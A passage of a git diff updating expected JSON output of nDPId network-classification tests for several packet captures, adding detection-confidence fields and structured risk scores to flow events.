{"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","server_names":"api.opendns.com,branded-login.opendns.com,cachecheck.opendns.com,community.opendns.com,dashboard2.opendns.com,dashboard.opendns.com,dashboard-ipv4.opendns.com,msp-login.opendns.com,api-ipv4.opendns.com,api-ipv6.opendns.com,authz.api.opendns.com,domain.opendns.com,help.vpn.opendns.com,ideabank.opendns.com,login.opendns.com,netgear.opendns.com,reseller-login.opendns.com,images.opendns.com,images-using.opendns.com,store.opendns.com,signup.opendns.com,twilio.opendns.com,updates.opendns.com,shared.opendns.com,tools.opendns.com,cache.opendns.com,api.umbrella.com,branded-login.umbrella.com,cachecheck.umbrella.com,community.umbrella.com,dashboard2.umbrella.com,dashboard.umbrella.com,dashboard-ipv4.umbrella.com,msp-login.umbrella.com,api-ipv4.umbrella.com,api-ipv6.umbrella.com,authz.api.umbrella.com,domain.umbrella.com,help.vpn.umbrella.com,ideabank.umbrella.com,login.umbrella.com,netgear.umbrella.com,reseller-login.umbrella.com,images.umbrella.com,images-using.umbrella.com,store.umbrella.com,signup.umbrella.com,twilio.umbrella.com,updates.umbrella.com,shared.umbrella.com,tools.umbrella.com,cache.umbrella.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=OpenDNS, Inc., CN=api.opendns.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"21:B4:CF:84:13:3A:21:A4:B0:02:63:76:39:84:EA:ED:27:EE:51:7C"}}
-00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1569579416636,"flow_last_seen":1569579417280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6018,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10":"TLS Certificate Mismatch"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"}}
+00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569579416636,"flow_last_seen":1569579416830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569579416830,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569579416636,"flow_last_seen":1569579417029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"ts_msec":1569579417029,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+02462{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569579416636,"flow_last_seen":1569579417030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4897,"flow_avg_l4_payload_len":489,"midstream":0,"ts_msec":1569579417030,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","server_names":"api.opendns.com,branded-login.opendns.com,cachecheck.opendns.com,community.opendns.com,dashboard2.opendns.com,dashboard.opendns.com,dashboard-ipv4.opendns.com,msp-login.opendns.com,api-ipv4.opendns.com,api-ipv6.opendns.com,authz.api.opendns.com,domain.opendns.com,help.vpn.opendns.com,ideabank.opendns.com,login.opendns.com,netgear.opendns.com,reseller-login.opendns.com,images.opendns.com,images-using.opendns.com,store.opendns.com,signup.opendns.com,twilio.opendns.com,updates.opendns.com,shared.opendns.com,tools.opendns.com,cache.opendns.com,api.umbrella.com,branded-login.umbrella.com,cachecheck.umbrella.com,community.umbrella.com,dashboard2.umbrella.com,dashboard.umbrella.com,dashboard-ipv4.umbrella.com,msp-login.umbrella.com,api-ipv4.umbrella.com,api-ipv6.umbrella.com,authz.api.umbrella.com,domain.umbrella.com,help.vpn.umbrella.com,ideabank.umbrella.com,login.umbrella.com,netgear.umbrella.com,reseller-login.umbrella.com,images.umbrella.com,images-using.umbrella.com,store.umbrella.com,signup.umbrella.com,twilio.umbrella.com,updates.umbrella.com,shared.umbrella.com,tools.umbrella.com,cache.umbrella.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=OpenDNS, Inc., CN=api.opendns.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"21:B4:CF:84:13:3A:21:A4:B0:02:63:76:39:84:EA:ED:27:EE:51:7C"}}
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1569579416636,"flow_last_seen":1569579417280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6018,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"}}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569579408876,"flow_last_seen":1569579409087,"flow_idle_time":7440000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":373,"flow_avg_l4_payload_len":186,"midstream":1,"ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","total-events-serialized":29}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -35,10 +35,10 @@
 ~~ total active/idle flows...: 5/5
 ~~ total timeout flows.......: 1
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4639599 bytes
-~~ total memory freed........: 4639599 bytes
-~~ total allocations/frees...: 99653/99653
+~~ total memory allocated....: 4723240 bytes
+~~ total memory freed........: 4723240 bytes
+~~ total allocations/frees...: 101243/101243
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
-~~ json string max len.......: 2360 chars
-~~ json string avg len.......: 1285 chars
+~~ json string max len.......: 2467 chars
+~~ json string avg len.......: 1336 chars
diff --git a/test/results/memcached.cap.out b/test/results/memcached.cap.out
index 1f56a2e2f..2a15aa371 100644
--- a/test/results/memcached.cap.out
+++ b/test/results/memcached.cap.out
@@ -3,8 +3,8 @@
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA8pT5AAEAGl3t\/AAABfwAAAejUK8sskd7QAAAAAKACqqr+MAAAAgT\/1wQCCAopIHvuAAAAAAEDAwc="}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASvL6NTLJnx6LJHe0aASqqr+MAAAAgT\/1wQCCAopIHvuKSB77gEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA0pT9AAEAGl4J\/AAABfwAAAejUK8sskd7RyyZ8e4AQAVb+KAAAAQEICikge+4pIHvu"}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","ndpi": {"proto":"Memcached","breed":"Acceptable","category":"Network"}}
-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Memcached","breed":"Acceptable","category":"Network"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"memcached.cap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 10/10
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597167 bytes
-~~ total memory freed........: 4597167 bytes
-~~ total allocations/frees...: 99564/99564
+~~ total memory allocated....: 4682120 bytes
+~~ total memory freed........: 4682120 bytes
+~~ total allocations/frees...: 101154/101154
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
-~~ json string max len.......: 655 chars
-~~ json string avg len.......: 468 chars
+~~ json string max len.......: 681 chars
+~~ json string avg len.......: 480 chars
diff --git a/test/results/modbus.pcap.out b/test/results/modbus.pcap.out
index df3220414..fdb2151a9 100644
--- a/test/results/modbus.pcap.out
+++ b/test/results/modbus.pcap.out
@@ -1,10 +1,10 @@
 00438{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"modbus.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1223541953927,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1223541953927,"pkt":"ABzAX0kKAArkxYMKCABFAAA0i\/1AAIAGEGjAqG6DwKhuiggaAfZB0urG4RU6zlAY\/MYAMgAAANEAAAAGAQMAAQAB"}
-00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","ndpi": {"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}}
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1223541953929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"ts_msec":1223541953929,"pkt":"AArkxYMKABzAX0kKCABFAAAzO9pAAIAGYIzAqG6KwKhugwH2CBrhFTrOQdLq0lAY++v\/BAAAANEAAAAFAQMCAAA="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1223541953929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1223541953929,"pkt":"ABzAX0kKAArkxYMKCABFAAA0i\/5AAIAGEGfAqG6DwKhuiggaAfZB0urS4RU62VAY\/LsAJgAAANIAAAAGAQMAAAAB"}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":102,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":102,"flow_first_seen":1223541953927,"flow_last_seen":1223541977037,"flow_idle_time":7440000,"flow_min_l4_payload_len":11,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":1173,"flow_avg_l4_payload_len":11,"midstream":1,"ts_msec":1223541977037,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":102,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":102,"flow_first_seen":1223541953927,"flow_last_seen":1223541977037,"flow_idle_time":7440000,"flow_min_l4_payload_len":11,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":1173,"flow_avg_l4_payload_len":11,"midstream":1,"ts_msec":1223541977037,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}}
 00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":102,"source":"modbus.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 102/102
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597787 bytes
-~~ total memory freed........: 4597787 bytes
-~~ total allocations/frees...: 99655/99655
+~~ total memory allocated....: 4682740 bytes
+~~ total memory freed........: 4682740 bytes
+~~ total allocations/frees...: 101245/101245
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 160 chars
-~~ json string max len.......: 662 chars
-~~ json string avg len.......: 473 chars
+~~ json string max len.......: 688 chars
+~~ json string avg len.......: 485 chars
diff --git a/test/results/monero.pcap.out b/test/results/monero.pcap.out
index da90e0e90..823158876 100644
--- a/test/results/monero.pcap.out
+++ b/test/results/monero.pcap.out
@@ -3,14 +3,14 @@
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1514196188350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1514196188350,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA8e7pAAEAG1e7AqAKUXhfHv7b2DQVL2\/baAAAAAKACchDZewAAAgQFtAQCCAocofANAAAAAAEDAwc="}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1514196188430,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1514196188430,"pkt":"cIXCQ0+ifmgbW\/gUCABF4AA8AABAADEGX8leF8e\/wKgClA0FtvbB2Ar1S9v226AScSCYUwAAAgQFtAQCCArnhI20HKHwDQEDAwc="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1514196188430,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1514196188430,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA0e7tAAEAG1fXAqAKUXhfHv7b2DQVL2\/bbwdgK9oAQAOU3CgAAAQEIChyh8F7nhI20"}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196188350,"flow_last_seen":1514196188430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1514196188430,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196188350,"flow_last_seen":1514196188430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1514196188430,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1514196196437,"flow_last_seen":1514196196437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1514196196437,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1514196196437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1514196196437,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA8ltZAAEAGxBLAqAKUdNOnw9JWDQXzKAOTAAAAAKACchCvSQAAAgQFtAQCCAqVhds1AAAAAAEDAwc="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1514196196745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1514196196745,"pkt":"cIXCQ0+ifmgbW\/gUCABFAAA0AABAACEGefF006fDwKgClA0F0lYVgl9O8ygDlIASchDSRAAAAgQFpAEBBAIBAwMH"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1514196196745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1514196196745,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAAoltdAAEAGxCXAqAKUdNOnw9JWDQXzKAOUFYJfT1AQAOWEMgAA"}
-00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196196437,"flow_last_seen":1514196196745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1514196196745,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1514196196437,"flow_last_seen":1514197261597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":7711,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
